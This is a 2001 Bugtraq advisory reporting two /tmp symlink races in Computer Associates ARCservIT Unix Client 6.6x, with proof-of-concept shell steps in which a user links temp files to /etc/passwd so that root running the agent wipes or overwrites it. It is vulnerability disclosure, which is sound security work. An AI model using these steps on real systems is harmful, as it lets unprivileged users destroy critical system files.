[20704] in bugtraq
tmp-races in ARCservIT Unix Client
daemon@ATHENA.MIT.EDU (Jonas Eriksson)
Fri May 18 11:01:26 2001
Date: Fri, 18 May 2001 11:10:31 +0200 (CEST)
From: Jonas Eriksson <je@sekure.net>
To: bugtraq@securityfocus.com
Message-ID: <Pine.BSO.4.21.0105181031380.1118-100000@birdie.sekure.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi,
Computer Associates ARCservIT Client version 6.6x has atleast two /tmp
races, as following:
Vulnerability #1
-----------------
This tmp-race only works if the asagent client never been executed
before.
As user:
je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp
And root:
root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u
ARCserveIT Universal Agent started...
Then,
je@boxname~> ls -la /etc/passwd
-r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd
Vulnerability #2
-----------------
As user:
je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp
And root:
root@boxname# /usr/CYEagent/asagent inet add
Then,
je@boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent
Computer Associates has been informed.
Regards
Jonas Eriksson
